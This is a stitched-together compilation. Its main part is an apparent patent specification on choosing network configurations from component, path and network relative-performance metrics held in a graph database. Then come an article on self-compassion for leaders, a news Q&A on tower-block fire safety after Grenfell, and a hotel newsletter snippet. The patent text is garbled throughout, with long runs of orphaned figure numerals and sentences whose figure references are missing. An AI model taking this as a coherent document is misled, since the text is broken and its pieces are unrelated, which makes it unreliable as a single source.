In the example of , the OCDE uses the example graph database interface to query the graph database to retrieve the sets of performance measurements for the network components represented by the topology information stored in the graph database . As disclosed above, the OCDE then (1) maps the retrieved sets of performance measurements to respective sets of mapped performance parameters, and (2) uses the sets of mapped performance parameters to determine respective sets of CRP parameters for the network components (e.g., with a given network component potentially having a different CRP parameter for each different supported service). In the example of , the OCDE uses the example graph database interface to store the respective sets of CRP parameters determined for the respective network components in the graph database . For example, the graph database interface may include a set of CRP parameters for a given network component with the topology information for that network component.
FIG. 3
140
205
315
125
125
140
205
320
125
110
140
140
140
140
1
0
As illustrated in the example of , the OCDE also uses the example graph database interface to (3) perform path identification by executing example path queries of the graph database to identify sets of possible paths (e.g., candidate paths) for routing traffic for given services between given pairs of network endpoints. For example, the graph database may employ any appropriate search techniques, pattern matching techniques, graph traversal techniques, etc., to discover possible paths between pairs of endpoints included in the stored topology information. As disclosed above, the OCDE then uses the example graph database interface to query the graph database for the sets of CRP parameters of the network components included in the sets of candidate paths. As disclosed above, the OCDE uses the retrieved sets of CRP parameters to (4) determine respective, service-specific PRP parameters for the candidate paths. As further disclosed above, the OCDE uses the service-specific PRP parameters to determine NSRP parameters for each service. The OCDE then uses the NSRP parameters, along with respective weights for the NSRP parameters, to determine an NRP parameter for a proposed network configuration. If the NRP of the proposed network configuration, NRP, is greater than the NRP of the current configuration, NRP, then the OCDE deploys the proposed network configuration.
FIGS. 4A-B
FIG. 1
FIG. 4A
400
450
125
400
405
410
400
405
410
400
415
420
140
405
410
illustrated further examples of topology information and stored in the example graph database of . In the illustrated example of , the topology information includes information describing example nodes A-B and an example link . The example topology information also specifies the arrangement (e.g., interconnections) of the example nodes A-B and the example link . The example topology information further includes example sets of CRPs A-B and determined by the example OCDE for the example nodes A-B and the example link , respectively.
FIG. 4B
FIG. 4B
450
455
460
450
455
460
450
465
470
140
455
460
465
470
455
460
In the illustrated example of , the topology information includes information describing example nodes A-C (e.g., which may be gateways, routers, etc.) and example links A-B. The example topology information also specifies the arrangement (e.g., interconnections) of the example nodes A-C and the example links A-B. The example topology information further includes example sets of CRPs A-C and A-B determined by the example OCDE for the example nodes A-C and the example links A-B, respectively. In the illustrated example of , the respective sets of CRPs A-C and A-B for the example nodes A-C and the example links A-B include different CRPs for a VoIP service, a video service, a text messaging service, etc.
FIGS. 5A-D
FIGS. 1-3
FIG. 5A
FIG. 5A
FIG. 5A
140
500
1
6
1
6
1
6
140
125
1
2
1
6
1
1
2
3
6
1
2
3
2
1
4
5
6
4
5
6
illustrate further example CRPs and PRPs capable of being determined by the example OCDE of for different example network topologies. illustrates a first example network topology including six (6) example nodes N through N interconnected by six (6) example links L through L, as shown. In the illustrated example of , traffic for a service is to be routed between endpoint node N and endpoint node N. In response to a query from the OCDE , the example graph database identifies two possible paths, P and P, capable of routing traffic between the pair of endpoint nodes N and N. As shown in the example of , the path P includes nodes N, N, N and N, which are interconnected by links L, L and L, as shown. The path P includes nodes N, N, N and N, which are interconnected by links L, L and L, as shown.
FIG. 5B
FIG. 5B
FIG. 5B
140
500
140
1
2
1
6
1
2
1
6
illustrates example CRP parameters determined by the example OCDE for the network components in the example topology , and example PRP parameters determined by the example OCDE for the possible paths P and P. In the illustrated example of , the CRP parameters for the network nodes N through N are assumed to have negligible effect on the PRP parameters determined for the possible paths P and P. Accordingly, the CRP parameters for the network nodes N through N are omitted in for clarity.
FIG. 5B
1
6
140
1
2
3
4
5
6
140
1
1
2
3
140
2
4
5
6
P1
P2
In the example of , for the service to be routed between endpoint nodes N and N, the OCDE determines, as disclosed above, a CRP of 1780 for link L, a CRP of 1400 for link L, a CRP of 600 for L, a CRP of 1100 for link L, a CRP of 3400 for link L and a CRP of 2700 for link L. Accordingly, the OCDE determines the PRP for path P to be the sum of the CRPs for links L, L and L, which is:
PRP=1780+1400+600=3780 Equation 5
Similarly, the OCDE determines the PRP for path P to be the sum of the CRPs for links L, L and L, which is:
PRP=1100+3400+2700=7200 Equation 6
FIG. 5C
505
7
7
8
500
125
140
1
6
7
8
7
140
125
3
1
6
3
1
4
7
6
4
7
8
140
3
4
7
8
P3
illustrates a second example network topology in which an example node N and example links L and L are added to the example network topology as shown in the figure. In response to the addition of these new network components to the topology information stored in the graph database , the OCDE determines, for the service to be routed between endpoint nodes N and N, a CRP of 3600 for link L and a CRP of 3900 for link L (the CRP for the node N is assumed to be negligible and, thus, is omitted for clarity). In response to another query from the OCDE , the example graph database returns path P as another possible path for routing traffic between the endpoint nodes N and N. Path P includes nodes N, N, N and N, which are interconnected by links L, L and L, as shown. The OCDE further determines the PRP for path P to be the sum of the CRPs for links L, L and L, which is:
PRP=1100+3600+3900=7600 Equation 7
FIG. 5D
505
9
500
2
5
125
140
1
6
9
140
125
4
1
6
4
1
2
5
6
1
9
6
140
4
1
9
6
P4
illustrates a third example network topology in which an example link L is added to the example network topology to interconnect example nodes N and N as shown in the figure. In response to the addition of this new network components to the topology information stored in the graph database , the OCDE determines, for the service to be routed between endpoint nodes N and N, a CRP of 2900 for link L. In response to another query from the OCDE , the example graph database returns path P as another possible path for routing traffic between the endpoint nodes N and N. Path P includes nodes N, N, N and N, which are interconnected by links L, L and L, as shown. The OCDE further determines the PRP for path P to be the sum of the CRPs for links L, L and L, which is:
PRP=1780+2900+2700=7380 Equation 8
FIG. 6
FIG. 1
FIG. 6
FIG. 1
FIGS. 1 and 6
FIG. 1
FIG. 6
600
105
600
100
illustrates an example communication network including a second example implementation of the configuration selector of . The example communication network of includes many elements in common with the example communication network of . As such, like elements in are labeled with the same reference numerals. The detailed descriptions of these like elements are provided above in connection with the discussion of and, in the interest of brevity, are not repeated in the discussion of .
FIG. 6
105
640
640
110
600
640
600
110
110
In the illustrated example of , the configuration selector includes an example OCDE structured to support parallel processing. More specifically, the example OCDE employs different processors and/or different processing threads to, for example, determine the sets of CRP parameters for the network components , the respective PRP parameters for different candidate paths for routing different services in the network , and the respective service-specific NSRP parameters in parallel with determining the sets of NRP parameters for different proposed network configurations. In this way, the OCDE can continuously update (e.g., in real-time) the topology information in the network as, for example, network components are added/removed, and/or the performance measurements for network components change.
640
645
650
655
660
645
650
655
660
645
210
215
110
650
220
225
600
655
250
600
660
230
255
260
600
600
640
210
640
225
640
250
640
255
645
650
655
660
802
FIG. 6
FIG. 6
FIG. 8
For example, the OCDE of includes at least four example processors , , , and (or at least four example processing threads , , , and ) which operate in parallel. In the illustrated example of , the processor implements the example CRP determiner and the example relative performance mapper to determine sets of CRP parameters for the network components . The example processor implements the example path identifier and the example PRP determiner to determine service-specific PRP parameters for candidate paths identified in the network . The example processor implements the example NSRP determiner to determine NSRP parameters for each service supported by the network . The example processor implements the example configuration identifier , the example NRP determiner , and the example configuration evaluator to determine NRP parameters for proposed configurations of the network and to select, based on the NRP parameters, a configuration (e.g., current or proposed) for the network . In some examples, the OCDE includes further processors (and/or processing threads) to allow multiple instances of, for example, the example CRP determiner to be executed to determine CRP parameters for different services in parallel. Additionally or alternatively, in some examples, the OCDE includes further processors (and/or processing threads) to allow multiple instances of, for example, the example PRP determiner to be executed to determine PRP parameters for different candidate paths in parallel. Additionally or alternatively, in some examples, the OCDE includes further processors (and/or processing threads) to allow multiple instances of, for example, the example NSRP determiner to be executed to determine NSRP parameters for different services in parallel. Additionally or alternatively, in some examples, the OCDE includes further processors (and/or processing threads) to allow multiple instances of, for example, the example NRP determiner to be executed to determine NRP parameters for different network configurations in parallel. The example processor , , , and/or may be implemented by any number(s), type(s) and/or combination(s) of processors, such as the example processor of , which is described in further detail below.
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
105
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
105
FIGS. 1-6
FIGS. 1-6
FIGS. 1-6
FIGS. 1-6
While example manners of implementing the example configuration selector is illustrated in , one or more of the elements, processes and/or devices illustrated in may be combined, divided, re-arranged, omitted, eliminated and/or implemented in any other way. Further, the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or , and/or, more generally, the example configuration selector of may be implemented by hardware, software, firmware and/or any combination of hardware, software and/or firmware. Thus, for example, any of the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or , and/or, more generally, the example configuration selector could be implemented by one or more analog or digital circuit(s), logic circuits, programmable processor(s), application specific integrated circuit(s) (ASIC(s)), programmable logic device(s) (PLD(s)) and/or field programmable logic device(s) (FPLD(s)). When reading any of the apparatus or system claims of this patent to cover a purely software and/or firmware implementation, at least one of the example configuration selector , the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or is/are hereby expressly defined to include a tangible computer readable storage device or storage disk such as a memory, a digital versatile disk (DVD), a compact disk (CD), a Blu-ray disk, etc. storing the software and/or firmware. Further still, the example configuration selector may include one or more elements, processes and/or devices in addition to, or instead of, those illustrated in , and/or may include more than one of any or all of the illustrated elements, processes and devices.
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
802
800
802
802
FIG. 8
In further examples, machine readable instructions may implement the example configuration selector , the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or . In this example, the machine readable instructions comprise one or more programs for execution by a processor, such as the processor shown in the example processor platform discussed below in connection with . The one or more programs, or portion(s) thereof, may be embodied in software stored on a tangible computer readable storage medium such as a CD-ROM, a floppy disk, a hard drive, a digital versatile disk (DVD), a Blu-ray Disk™, or a memory associated with the processor , but the entire program or programs and/or portions thereof could alternatively be executed by a device other than the processor and/or embodied in firmware or dedicated hardware (e.g., implemented by an ASIC, a PLD, an FPLD, discrete logic, etc.).
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
As mentioned above, the example configuration selector , the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or may be implemented using coded instructions (e.g., computer and/or machine readable instructions) stored on a tangible computer readable storage medium such as a hard disk drive, a flash memory, a read-only memory (ROM), a compact disk (CD), a digital versatile disk (DVD), a cache, a random-access memory (RAM) and/or any other storage device or storage disk in which information is stored for any duration (e.g., for extended time periods, permanently, for brief instances, for temporarily buffering, and/or for caching of the information). As used herein, the term tangible computer readable storage medium is expressly defined to include any type of computer readable storage device and/or storage disk and to exclude propagating signals and to exclude transmission media. As used herein, “tangible computer readable storage medium” and “tangible machine readable storage medium” are used interchangeably.
105
110
125
130
135
140
640
145
205
210
215
220
225
250
230
255
260
645
650
655
660
Additionally or alternatively, the example configuration selector , the example network components , the example graph database , the example network controller(s) , the example network monitor(s) , the example OCDEs and/or , the example policy storage , the example graph database interface , the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example ZNSRP determiner , the example configuration identifier , the example NRP determiner , the example configuration evaluator , the example processors , , , and/or may be implemented using coded instructions (e.g., computer and/or machine readable instructions) stored on a non-transitory computer and/or machine readable medium such as a hard disk drive, a flash memory, a ROM, a CD, a DVD, a cache, a RAM and/or any other storage device or storage disk in which information is stored for any duration (e.g., for extended time periods, permanently, for brief instances, for temporarily buffering, and/or for caching of the information). As used herein, the term non-transitory computer readable medium is expressly defined to include any type of computer readable storage device and/or storage disk and to exclude propagating signals and to exclude transmission media. As used herein, when the phrase “at least” is used as the transition term in a preamble of a claim, it is open-ended in the same manner as the terms “comprising” and “including” are open ended. Also, as used herein, the terms “computer readable” and “machine readable” are considered equivalent unless indicated otherwise.
FIG. 7
FIGS. 1-6
FIG. 7
700
105
700
705
710
140
105
230
140
is a flowchart illustrating an example program that may be executed to implement the example configuration selector of . With reference to the preceding figures and associated written descriptions, the example program of begins execution at block and proceeds to block , at which the example OCDE of the configuration selector identifies a proposed network configuration. In one example, the proposed network configuration is identified using the configuration identifier of the example OCDE and represents an incremental change to the current network configuration.
715
140
230
At block , the example OCDE models, e.g., via the configuration identifier , the proposed network configuration in real time, for instance using a virtual network model.
720
140
125
105
110
100
At block , the example OCDE queries the example graph database of the configuration selector to access respective sets of performance measurements for the network components included in the network under the proposed configuration.
725
140
705
At block , the OCDE maps the sets of performance measurements accessed at block to corresponding sets of mapped performance parameters, as described above.
730
140
110
725
145
105
735
140
125
100
At block , the OCDE determines (e.g., according to Equation 1, as described above) respective sets of service specific CRP parameters for the network components based on the sets of mapped performance parameters determined at block and the service specific policies accessed from the example policy storage of the configuration selector . At block , the OCDE queries the graph database to identify one or more sets of candidate paths capable of routing traffic for one or more services between one or more pairs of endpoints in the network .
740
140
730
110
At block , the OCDE determines (e.g., according to Equation 2, as described above) respective service specific PRP parameters for the identified candidate paths based on the service specific CRP parameters determined at block for the network components .
745
140
740
750
140
745
At block , the OCDE determines (e.g., according to Equation 3, as described above) network service relative performance parameters for the services supported by the network, based on the service specific PRP parameters determined at block . At block , the OCDE determines (e.g., according to Equation 4, as described above) network relative performance parameters for the proposed network configuration, based on the service specific NSRP parameters determined at block .
755
140
750
100
At block , the example OCDE selects, based on the NRP parameters determined at block , the optimal configuration for the network . In one example, the optimal configuration is whichever of the current configuration and the proposed configuration has the higher-value NRP parameters.
760
140
130
110
700
765
At block , the OCDE transmits configuration information describing the selected configuration to, for example, the network controller(s) to enable the network components to be arranged according to the selected network configuration. The method then ends in block .
FIG. 7
FIG. 6
FIG. 7
700
700
700
705
730
770
735
765
775
770
110
700
In the illustrated example of , the example program is depicted as being executed sequentially. However, execution of the example program is not limited thereto. For example, the program supports parallel execution by two or more parallel processing threads. For example, the processing at one or more of blocks - may be performed by a first example processing thread , whereas the processing at one or more of blocks - may be performed by a second example processing thread executing in parallel with the first processing thread . Such an example implementation permits processing related to determining the sets of service specific CRP parameters for the network components and processing related to determining the service specific PRP parameters for the candidate paths to be performed in parallel. Other parallel processing arrangements, such as those described above in connection with , are supported by the example program of . For instance, additional separate processing threads could be established to support determination of the NSRP and/or NRP parameters in parallel with the CRP and PRP parameters.
FIG. 8
FIG. 6
FIGS. 1-6
800
105
800
is a block diagram of an example processor platform capable of executing the instructions of to implement the example configuration selector of . The processor platform can be, for example, a server, a personal computer, a mobile device (e.g., a cell phone, a smart phone, a tablet computer), a personal digital assistant (PDA), an Internet appliance, or any other type of computing device.
800
802
802
802
802
806
826
210
215
220
225
250
230
255
260
FIG. 8
FIG. 6
FIG. 2
The processor platform of the illustrated example includes a processor . The processor of the illustrated example is hardware. For example, the processor can be implemented by one or more integrated circuits, logic circuits, microprocessors or controllers from any desired family or manufacturer. In the illustrated example of , the processor includes one or more example processing cores configured via example instructions , which include the example instructions of to implement the example CRP determiner , the example relative performance mapper , the example path identifier , the example PRP determiner , the example NSRP determiner , the example configuration identifier , the example NRP determiner , or the example configuration evaluator of .
802
804
802
808
810
820
820
808
810
808
810
The processor of the illustrated example includes a local memory (e.g., a cache). The processor of the illustrated example is in communication with a main memory including a volatile memory and a non-volatile memory via a link . The link may be implemented by a bus, one or more point-to-point connections, etc., or a combination thereof. The volatile memory may be implemented by Synchronous Dynamic Random Access Memory (SDRAM), Dynamic Random Access Memory (DRAM), RAMBUS Dynamic Random Access Memory (RDRAM) and/or any other type of random access memory device. The non-volatile memory may be implemented by flash memory and/or any other desired type of memory device. Access to the main memory , is controlled by a memory controller.
800
816
816
The processor platform of the illustrated example also includes an interface circuit . The interface circuit may be implemented by any type of interface standard, such as an Ethernet interface, a universal serial bus (USB), and/or a PCI express interface.
814
816
814
802
800
In the illustrated example, one or more input devices are connected to the interface circuit . The input device(s) permit(s) a user to enter data and commands into the processor . The input device(s) can be implemented by, for example, an audio sensor, a microphone, a camera (still or video), a keyboard, a button, a mouse, a touchscreen, a track-pad, a trackball, a trackbar (such as an isopoint), a voice recognition system and/or any other human-machine interface. Also, many systems, such as the processor platform , can allow the user to control the computer system and provide data to the computer using physical gestures, such as, but not limited to, hand or body movements, facial expressions, and face recognition.
818
816
818
820
One or more output devices are also connected to the interface circuit of the illustrated example. The output devices can be implemented, for example, by display devices (e.g., a light emitting diode (LED), an organic light emitting diode (OLED), a liquid crystal display, a cathode ray tube display (CRT), a touchscreen, a tactile output device, a printer and/or speakers). The interface circuit of the illustrated example, thus, typically includes a graphics driver card, a graphics driver chip or a graphics driver processor.
816
820
816
205
FIG. 8
The interface circuit of the illustrated example also includes a communication device such as a transmitter, a receiver, a transceiver, a modem and/or network interface card to facilitate exchange of data with external machines (e.g., computing devices of any kind) via a network (e.g., an Ethernet connection, a digital subscriber line (DSL), a telephone line, coaxial cable, a cellular telephone system, etc.). In the illustrated example of , the interface circuit is also structured to implement the example graph database interface .
800
812
812
812
125
145
808
125
145
The processor platform of the illustrated example also includes one or more mass storage devices for storing software and/or data. Examples of such mass storage devices include floppy disk drives, hard drive disks, compact disk drives, Blu-ray disk drives, RAID (redundant array of independent disks) systems, and digital versatile disk (DVD) drives. In some examples, the mass storage device may implement the example graph database and/or the example policy storage . Additionally or alternatively, in some examples the volatile memory may implement the example graph database and/or the example service profile storage .
826
812
808
810
804
822
FIG. 6
Coded instructions corresponding to the instructions of may be stored in the mass storage device , in the volatile memory , in the non-volatile memory , in the local memory and/or on a removable tangible computer readable storage medium, such as a CD or DVD .
At least some of the above described example methods and/or apparatus are implemented by one or more software and/or firmware programs running on a computer processor. However, dedicated hardware implementations including, but not limited to, application specific integrated circuits, programmable logic arrays and other hardware devices can likewise be constructed to implement some or all of the example methods and/or apparatus described herein, either in whole or in part. Furthermore, alternative software implementations including, but not limited to, distributed processing or component/object distributed processing, parallel processing, or virtual machine processing can also be constructed to implement the example methods and/or apparatus described herein.
To the extent the above specification describes example components and functions with reference to particular standards and protocols, it is understood that the scope of this patent is not limited to such standards and protocols. For instance, each of the standards for Internet and other packet switched network transmission (e.g., Transmission Control Protocol (TCP)/Internet Protocol (IP), User Datagram Protocol (UDP)/IP, HyperText Markup Language (HTML), HyperText Transfer Protocol (HTTP)) represent examples of the current state of the art. Such standards are periodically superseded by faster or more efficient equivalents having the same general functionality. Accordingly, replacement standards and protocols having the same functions are equivalents which are contemplated by this patent and are intended to be included within the scope of the accompanying claims.
Additionally, although this patent discloses example systems including software or firmware executed on hardware, it should be noted that such systems are merely illustrative and should not be considered as limiting. For example, it is contemplated that any or all of these hardware and software components could be embodied exclusively in hardware, exclusively in software, exclusively in firmware or in some combination of hardware, firmware and/or software. Accordingly, while the above specification described example systems, methods and articles of manufacture, the examples are not the only way to implement such systems, methods and articles of manufacture. Therefore, although certain example methods, apparatus and articles of manufacture have been described herein, the scope of coverage of this patent is not limited thereto. On the contrary, this patent covers all methods, apparatus and articles of manufacture fairly falling within the scope of the claims either literally or under the doctrine of equivalents.
BACKGROUND
SUMMARY OF THE DISCLOSURE
DETAILED DESCRIPTION
BRIEF DESCRIPTION OF THE DRAWINGS
The teaching of the present disclosure can be readily understood by considering the following detailed description in conjunction with the accompanying drawings, in which:
FIG. 1
illustrates a block diagram of an example communication network including an example configuration selector to determine an optimal network configuration in accordance with the teachings of this disclosure;
FIG. 2
FIG. 1
illustrates a block diagram of an example implementation of the optimal composition determination engine of ;
FIG. 3
FIG. 1
is a block diagram illustrating example information exchanged between the example optimal composition determination engine and the example graph database of the example configuration selector of ;
FIGS. 4A-B
FIG. 1
illustrated further examples of topology information stored in the example graph database of ;
FIGS. 5A-D
FIGS. 1-3
illustrate further example component relative performance metrics and path relative performance metrics capable of being determined by the example optimal composition determination engine of for different example network topologies;
FIG. 6
FIG. 1
illustrates an example communication network including a second example implementation of the configuration selector of ;
FIG. 7
FIGS. 1-6
is a flowchart illustrating an example program that may be executed to implement the example configuration selector of ; and
FIG. 8
FIG. 6
FIGS. 1-6
is a block diagram of an example processor platform capable of executing the instructions of to implement the example configuration selector of . | |
Being kind to yourself empowers you to grow and give.
What if there was a practice that could reduce your fear, calm your anxiety, and buffer your stress as you struggle through the COVID-19 crisis?
In fact, there is such a treatment, and it is called "self-compassion." Researchers began to discover the benefits of self-compassion over a decade ago, and during the pandemic the concept has become more widely known. Universities and other organizations have offered self-compassion events, tips, and trainings to help students and employees cope. And initial results suggest these efforts have paid off. Studies performed since the beginning of the pandemic have shown that while self-compassion can't fight a virus, it is surprisingly effective in helping us build resilience and find greater mental and physical wellbeing overall.
So what holds us back from practicing self-compassion?
Studies suggest that while leaders—and values-driven leaders in particular—have much to gain from self-compassion, they may hesitate to practice it.
The reason is simple: We believe we need to be hard on ourselves in order to motivate ourselves to become more ethical. However, research shows that the opposite is true: Self-compassion actually provides more motivation for moral improvement.
To see why this is the case, we need to understand more about what self-compassion is—and what it is not.
Self-Compassion is Not Self-Esteem
Decades ago, many psychologists believed that self-esteem was the linchpin of mental health. Many of them suggested that we should aim to boost our self-esteem directly.
These efforts may have contributed to what some have called a "narcissism epidemic." And in addition, they can embolden some of our worst tendencies. They tend to reinforce the idea that we do not need to improve our character because we are already better than average. And they can also encourage us to see ourselves as uniquely special by putting others down.
Self-compassion, however, is very different from self-esteem in three important ways:
1. Mindfulness.
Whereas we might seek to boost our self-esteem by ignoring our failings or explaining them away, self-compassion begins with mindfully acknowledging our failures and the suffering they cause.
2. Common humanity.
Instead of seeing ourselves as uniquely special and different from others, we should zoom out and see our struggles as human struggles. Just like others, we are deserving of kindness, even when we make mistakes or come up short.
3. Self-kindness.
Instead of getting stuck in a rut of harsh self-criticism, we should insist on having a kind and caring attitude toward ourselves. This does not mean we are letting ourselves off the hook. It means we are seeing our weaknesses for what they are instead of denying them or exaggerating them.
Self-Compassion Enables Self-Improvement
In one influential study of self-compassion, researchers at UC Berkeley found that far from reducing our motivation to do better and be better, self-compassion increased self-improvement motivation across the board.
The researchers recruited study participants who had experienced some form of personal failure or setback. They helped the participants practice self-compassion and compared the participants' motivations to other groups who did not receive any help or who were asked to focus on self-esteem. Self-compassion helped participants recognize their ability to change. It helped participants who had wronged someone find the motivation to change their ways and to make amends. And it also helped participants find the motivation to improve in other ways—for example, after failing at a test.
These findings, the researchers say, reveal a paradox: "personal failure may make people more motivated to improve themselves." But in order to harness the power of our failures, we need self-compassion to help us identify them, see them for what they are, and recognize that we have the power to do better.
Self-compassion helps rid us of the shame, not guilt. "With guilt," Taya Cohen and her colleagues explain, "the focus is on one’s behavior ('I did a bad thing'), whereas, with shame, the focus is on one’s self ('I’m a bad person')." Guilt-prone people are an asset. They are likely to recognize bad behavior and feel a strong motivation to make it right. Shame-prone people operate differently. When they make a mistake, they tend to see themselves as bad. Rather than seeking to make amends, they tend to withdraw from the situation altogether.
Put it in Practice
Fail better.
Failure is inevitable—especially during difficult times. Leaders are experiencing "moral stress" due to all of the competing demands that are placed upon them. Start by being realistic. Expect that you will fail sometimes. Perfection is never an option, but progress always is.
Take a self-compassion break.
The simplest way to practice self-compassion is to focus on the three elements described above. Mindfully take notice of your failures and hardships. See them as part of a common human struggle. And resolve to approach yourself with kindness. This simple practice, which takes only a few minutes, is enough to experience tangible effects. [Audio guide.]
Befriend yourself.
One key insight of self-compassion research is that we should simply show ourselves the same kindness we would show to a good friend. Experts recommend imagining and/or writing about how we would treat a friend who was in our situation. Doing so can help us gain the right perspective—one that's balanced rather than too harsh or too indulgent.
Self-compassion research can save us from a too-narrow view of motivation, one that says we improve only by being harsh and uncompromising with ourselves and others. By embracing a broader view, we can help build a kinder world. And we can start by being kind to ourselves. | https://ethicalleadership.nd.edu/news/want-to-be-a-compassionate-leader-start-with-self-compassion/ |
It was a horror sight that shocked the nation.
The awful images of fire ripping through Grenfell Tower in West London has sparked feelings of sorrow, anger and heartbreak - but it has also provoked questions.
How was this awful loss of life - at least 30 so far - allowed to happen? Why did the fire start? And for many residents living in tower blocks across the North East - could this happen in my home?
Questions need to be answered as Prime Minister Theresa May orders a full public inquiry into the Grenfell Tower tragedy.
We have now spoken to Your Homes Newcastle - which manages tower blocks in the city on behalf of Newcastle City Council - and put a series of important questions to them.
Here’s what they told us:
What safety assurances can you give on the tower blocks in our area that have recently had improvements or new cladding installed?
Over recent years a number of the city council’s blocks have been improved to enhance thermal efficiency, including external cladding.
The type of cladding used at Grenfell Tower has NOT been installed on Newcastle City Council buildings. All work undertaken is fully compliant with the Building Regulations.
Have fire sprinklers been retro-fitted on our old tower blocks? If so, when was this work carried out and if not, why has this not been carried out?
None of our tower blocks - more than eight floors - have sprinkler systems.
All of the tower blocks have dry risers installed, which allow the Fire and Rescue Service to distribute water at each floor without running hoses.
Blocks over 15 storeys have wet risers which supply water to the Fire and Rescue Service on demand.
The blocks are designed to provide segregation in the event of a fire through compartmentation - in other words using fire doors, floors and walls to prevent fires spreading.
We have managed the installation of sprinkler systems in many of our new build developments, particularly those for vulnerable customers.
We will be studying the report into the tragic incidents at Grenfell Tower and implementing any necessary Government recommendations as a minimum.
Yesterday YHN confirmed you would not be conducting immediate fire risk assessments on tower blocks - saying they were already subject to annual assessments – and that you would wait for guidance from the fire service before deciding on a course of action. Is this still the case?
We will continue with our rolling programme of re-inspection in addition to the annual inspection of a small number of higher risk properties.
We have now been contacted by our Chief Fire Officer and will be meeting with him once all of the facts are known so that we can implement a controlled and coordinated response.
Are tower block residents here issued any fire safety advice or guidance? If so – what is the extent of this?
All tower block residents are issued fire safety guidance on sign-up. There is signage around the buildings and in the lifts.
We will reissue YHN’s fire safety advice to customers living in high rise blocks over the weekend - ‘If in doubt, get out and call 999’.
Are smoke alarms and fire doors fitted as standard in all of our tower block apartments, and have they been retrofitted on the older buildings? If not, why not?
The safety of tenants has always been a priority for YHN and, prior to April 2004, the City Council. For instance, all of the high rise properties that we manage had been fitted with battery operated and hard-wired smoke detectors even before our last citywide investment programme.
How much has been spent on fire safety and preventative measures across the city? Please provide a breakdown of how this has been spent?
We work in partnership with the Tyne and Wear Fire & Rescue Service to make sure that we comply with fire safety legislation and identify any ways that we can improve fire safety in all the homes we manage.
Fire safety risk assessment folders have been produced and delivered to each building. These include the fire risk assessment, guidance notes, test record sheets and building plans. Action plans have also been produced indicating where improvements to fire safety procedures, maintenance or improvements should be carried out.
A programme of mandatory Fire Safety training is embedded within YHN with courses tailored to the requirements of different staff groups.
In total we have spent approximately £3.3m on a variety of fire stopping/prevention measures. The majority of this is relating to multi storey blocks.
Some of this spend is for the communal upgrade programme which will include other type of work but will include replacement fire doors and fire risk assessments items.
In 2017/18 we are planning to spend approx. £1.5m on communal upgrades, which includes fire doors and any items identified through the fire risk assessments.
How involved are residents in the management of tower blocks under your control?
Some blocks will have had tenants’ and residents’ associations and there are opportunities for residents to get involved with YHN directly, but this is not compulsory and not all residents or blocks take up this opportunity. Where tenants want to do so, we are keen to support this and to share relevant information.
We also approached Gateshead Housing Association who manage tower blocks on behalf of Gateshead Council.
The organisation told us they understand the concerns of residents in light of the London tragedy and issued a statement of reassurance.
A spokesperson said: “We want to reassure all our residents that we work very closely with Tyne and Wear Fire and Rescue Service to keep our customers safe. All of our multi-storey blocks receive fire risk assessments, and each block has a resident caretaker who carries out regular safety checks.
“We would advise people living in multi-storey blocks to always call 999 immediately after discovering a fire. We have been in contact with fire service colleagues today and we will respond to any advice and undertake any actions identified following this tragic event.
“We understand that many of our customers will have concerns after seeing what happened in London and we would advise anyone who is worried to email the Multi-storey Team at [email protected] or call 0191 433 5370.”
The Gentoo Group is responsible for more than 29,000 homes in Sunderland said they were beginning to meet residents face-to-face following the tragedy. The also confirmed that cladding used on their properties across the region were NOT made of the same material as the London block.
John Craggs, chief executive officer of the group, said: “I can confirm that none of the high rise blocks in Gentoo’s ownership have the same cladding and insulation as appears to be the case at Grenfell Tower.
“In addition, I can also confirm that the contractors and sub-contractors referred to in the tragedy, have not been used in work to our high rise blocks.
“Despite the comprehensive precautions we already have in place in our high rise buildings and with our residents, I have instructed our team to fully review our approach to fire risk management.
“Clearly, as verified details emerge from Grenfell Tower, we will of course further investigate and check to ensure that, if there are lessons to be learned, we will continue to work very closely with the fire service to ensure that the safety of our customers remains our number one priority.
“Our main priority at Gentoo is to reassure our customers and their families, that the fire alarm equipment and procedures we have in place are fit for purpose. | https://www.chroniclelive.co.uk/news/north-east-news/vital-questions-answered-safety-north-13192850 |
This Week’s Stories!
Hurricane Sandy is sweeping through we suggest that you hold onto you hats and if you lose power remember that we are here and happy to help. If you find yourself unfortunate enough to be without power, give us a call or stop by, ask about our helping hands storm rate.
- I’ll toast to that! One of our guests who were staying in the Luxury Suite accommodations were celebrating their anniversary and had brought their wedding day champagne flutes along to celebrate. Janet noticed the glasses left by the fireplace and washed and replaced them so they could enjoy them once more in front of the fire.
- Sometimes the excitement of vacation can be so grand that you actually forget where you are supposed to go. Whitney was cleaning in our East building when she was approached by two guests who were looking for their room, Whitney discovered that the guest’s room was located in the South building and personally walked them over to their room and assisted with their luggage.
